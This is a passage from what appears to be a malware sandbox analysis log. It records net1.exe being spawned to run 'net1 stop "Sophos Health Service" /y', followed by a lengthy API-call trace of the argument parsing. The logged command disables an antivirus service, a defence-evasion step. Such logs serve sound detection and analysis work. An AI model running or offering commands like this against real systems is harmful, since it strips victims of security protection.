Authentication" [0x7] Thread: id = 137 os_tid = 0x7a0 Process: id = "70" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47c52000" os_pid = "0x6e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0x7b4" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Health ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 138 os_tid = 0x7d4 [0043.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bf888 | out: lpSystemTimeAsFileTime=0x2bf888*(dwLowDateTime=0xe3fe64e0, dwHighDateTime=0x1d57a86)) [0043.276] GetCurrentProcessId () returned 0x6e4 [0043.276] GetCurrentThreadId () returned 0x7d4 [0043.276] GetTickCount () returned 0x1145cc1 [0043.276] QueryPerformanceCounter (in: lpPerformanceCount=0x2bf880 | out: lpPerformanceCount=0x2bf880*=16356080646) returned 1 [0043.276] GetModuleHandleA (lpModuleName=0x0) returned 0xfa0000 [0043.276] __set_app_type (_Type=0x1) [0043.276] __p__fmode () returned 0x74eb31f4 [0043.276] __p__commode () returned 0x74eb31fc [0043.286] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfaffe6) returned 0x0 [0043.324] __getmainargs (in: _Argc=0xfb9064, _Argv=0xfb906c, _Env=0xfb9068, _DoWildCard=0, _StartInfo=0xfb9024 | out: _Argc=0xfb9064, _Argv=0xfb906c, _Env=0xfb9068) returned 0 [0043.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.324] GetConsoleOutputCP () returned 0x1b5 [0043.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfb9080 | out: lpCPInfo=0xfb9080) returned 1 [0043.324] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.328] sprintf_s (in: _DstBuf=0x2bf840, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0043.328] setlocale (category=0, locale=".437") returned="English_United States.437" [0043.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0043.330] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0043.330] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Health ServiceΓÇ¥ /y" [0043.330] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf60c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0043.331] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x92) returned 0x434c00 [0043.331] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0043.331] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf810 | out: Buffer=0x2bf810*=0x431c98) returned 0x0 [0043.331] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf810 | out: Buffer=0x2bf810*=0x431cb0) returned 0x0 [0043.331] _fileno (_File=0x74eb2900) returned -2 [0043.331] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0043.331] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0043.331] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0043.331] _wcsicmp (_String1="config", _String2="stop") returned -16 [0043.331] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0043.331] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0043.331] _wcsicmp (_String1="file", _String2="stop") returned -13 [0043.331] _wcsicmp (_String1="files", _String2="stop") returned -13 [0043.331] _wcsicmp (_String1="group", _String2="stop") returned -12 [0043.331] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0043.331] _wcsicmp (_String1="help", _String2="stop") returned -11 [0043.331] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0043.331] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0043.331] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0043.331] _wcsicmp (_String1="session", _String2="stop") returned -15 [0043.331] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0043.332] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0043.332] _wcsicmp (_String1="share", _String2="stop") returned -12 [0043.332] _wcsicmp (_String1="start", _String2="stop") returned -14 [0043.332] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0043.332] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0043.332] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0043.332] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0043.332] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0043.332] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0043.332] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0043.332] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0043.332] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0043.332] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0043.332] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0043.332] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0043.332] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0043.332] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0043.332] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0043.332] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0043.332] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0043.332] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0043.333] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0043.333] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0043.333] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0043.333] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0043.333] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0043.333] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0043.333] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0043.333] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0043.333] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0043.333] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0043.333] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0043.333] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0043.333] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0043.333] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0043.333] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0043.333] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0043.333] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0043.333] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0043.333] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0043.333] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0043.333] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0043.333] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0043.333] _wcsicmp (_String1="accounts", _String2="Health") returned -7 [0043.333] _wcsicmp (_String1="computer", _String2="Health") returned -5 [0043.333] _wcsicmp (_String1="config", _String2="Health") returned -5 [0043.333] _wcsicmp (_String1="continue", _String2="Health") returned -5 [0043.334] _wcsicmp (_String1="cont", _String2="Health") returned -5 [0043.334] _wcsicmp (_String1="file", _String2="Health") returned -2 [0043.334] _wcsicmp (_String1="files", _String2="Health") returned -2 [0043.334] _wcsicmp (_String1="group", _String2="Health") returned -1 [0043.334] _wcsicmp (_String1="groups", _String2="Health") returned -1 [0043.334] _wcsicmp (_String1="help", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="helpmsg", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="localgroup", _String2="Health") returned 4 [0043.334] _wcsicmp (_String1="pause", _String2="Health") returned 8 [0043.334] _wcsicmp (_String1="session", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="sessions", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="sess", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="share", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="start", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="stats", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="statistics", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="stop", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="time", _String2="Health") returned 12 [0043.334] _wcsicmp (_String1="user", _String2="Health") returned 13 [0043.334] _wcsicmp (_String1="users", _String2="Health") returned 13 [0043.334] _wcsicmp (_String1="msg", _String2="Health") returned 5 [0043.334] _wcsicmp (_String1="messenger", _String2="Health") returned 5 [0043.334] _wcsicmp (_String1="receiver", _String2="Health") returned 10 [0043.334] _wcsicmp (_String1="rcv", _String2="Health") returned 10 [0043.334] _wcsicmp (_String1="netpopup", _String2="Health") returned 6 [0043.334] _wcsicmp (_String1="redirector", _String2="Health") returned 10 [0043.334] _wcsicmp (_String1="redir", _String2="Health") returned 10 [0043.334] _wcsicmp (_String1="rdr", _String2="Health") returned 10 [0043.334] _wcsicmp (_String1="workstation", _String2="Health") returned 15 [0043.334] _wcsicmp (_String1="work", _String2="Health") returned 15 [0043.334] _wcsicmp (_String1="wksta", _String2="Health") returned 15 [0043.334] _wcsicmp (_String1="prdr", _String2="Health") returned 8 [0043.334] _wcsicmp (_String1="devrdr", _String2="Health") returned -4 [0043.334] _wcsicmp (_String1="lanmanworkstation", _String2="Health") returned 4 [0043.334] _wcsicmp (_String1="server", _String2="Health") returned 11 [0043.334] _wcsicmp (_String1="svr", _String2="Health") returned 11 [0043.335] _wcsicmp (_String1="srv", _String2="Health") returned 11 [0043.335] _wcsicmp (_String1="lanmanserver", _String2="Health") returned 4 [0043.335] _wcsicmp (_String1="alerter", _String2="Health") returned -7 [0043.335] _wcsicmp (_String1="netlogon", _String2="Health") returned 6 [0043.335] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0043.335] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.335] wcscpy_s (in: _Destination=0x2bf310, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0043.335] LoadLibraryW (lpLibFileName="neth.dll") returned 0x73ef0000 [0043.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2bf30c, nSize=0x0, Arguments=0x2bf308 | out: lpBuffer="叨Cneth.dll") returned 0xff [0043.337] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0043.337] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0043.337] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0043.337] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0043.337] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0043.338] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.338] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0043.338] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0043.338] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0043.338] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.338] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0043.338] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0043.338] _wcsicmp (_String1="CONT", _String2="Health") returned -5 [0043.338] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0043.338] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.338] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0043.338] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.338] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0043.338] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.338] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0043.338] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0043.338] _wcsicmp (_String1="FILES", _String2="Health") returned -2 [0043.338] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0043.338] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.338] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0043.338] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.338] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0043.339] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.339] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0043.339] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0043.339] _wcsicmp (_String1="GROUPS", _String2="Health") returned -1 [0043.339] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0043.339] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.339] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0043.339] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.339] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0043.339] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.339] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0043.339] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0043.339] _wcsicmp (_String1="REPL", _String2="Health") returned 10 [0043.339] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0043.339] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0043.339] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.339] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0043.339] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0043.339] _wcsicmp (_String1="REPLICATOR", _String2="Health") returned 10 [0043.339] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0043.339] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.339] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0043.339] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.339] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0043.339] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.339] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0043.340] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0043.340] _wcsicmp (_String1="SESSIONS", _String2="Health") returned 11 [0043.340] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0043.340] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.340] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0043.340] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0043.340] _wcsicmp (_String1="SESS", _String2="Health") returned 11 [0043.340] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.340] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0043.340] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0043.340] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.340] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0043.340] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0043.340] _wcsicmp (_String1="STATS", _String2="Health") returned 11 [0043.340] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.340] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0043.340] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0043.340] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.340] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0043.340] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0043.340] _wcsicmp (_String1="USERS", _String2="Health") returned 13 [0043.340] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.340] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0043.340] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.340] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0043.340] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.340] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0043.341] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0043.341] _wcsicmp (_String1="REDIRECTOR", _String2="Health") returned 10 [0043.341] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0043.341] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.341] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0043.341] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0043.341] _wcsicmp (_String1="REDIR", _String2="Health") returned 10 [0043.341] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0043.341] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.341] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0043.341] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0043.341] _wcsicmp (_String1="RDR", _String2="Health") returned 10 [0043.341] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0043.341] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.341] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0043.341] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0043.341] _wcsicmp (_String1="WORK", _String2="Health") returned 15 [0043.341] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0043.341] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.341] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0043.341] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0043.341] _wcsicmp (_String1="WKSTA", _String2="Health") returned 15 [0043.341] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0043.341] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.341] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0043.341] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0043.341] _wcsicmp (_String1="PRDR", _String2="Health") returned 8 [0043.341] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0043.341] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0043.342] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0043.342] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0043.342] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0043.342] _wcsicmp (_String1="DEVRDR", _String2="Health") returned -4 [0043.342] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0043.342] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.342] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0043.342] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.342] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0043.342] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0043.342] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0043.342] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0043.342] _wcsicmp (_String1="SVR", _String2="Health") returned 11 [0043.342] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0043.342] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0043.342] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.342] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0043.342] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0043.342] _wcsicmp (_String1="SRV", _String2="Health") returned 11 [0043.342] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0043.342] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2bf30c, nSize=0x0, Arguments=0x2bf308 | out: lpBuffer="嗰Cꔺ瓡") returned 0x1c [0043.342] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0043.342] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0043.342] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0043.342] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0043.342] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0043.342] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0043.342] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0043.342] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.342] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0043.342] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0043.342] 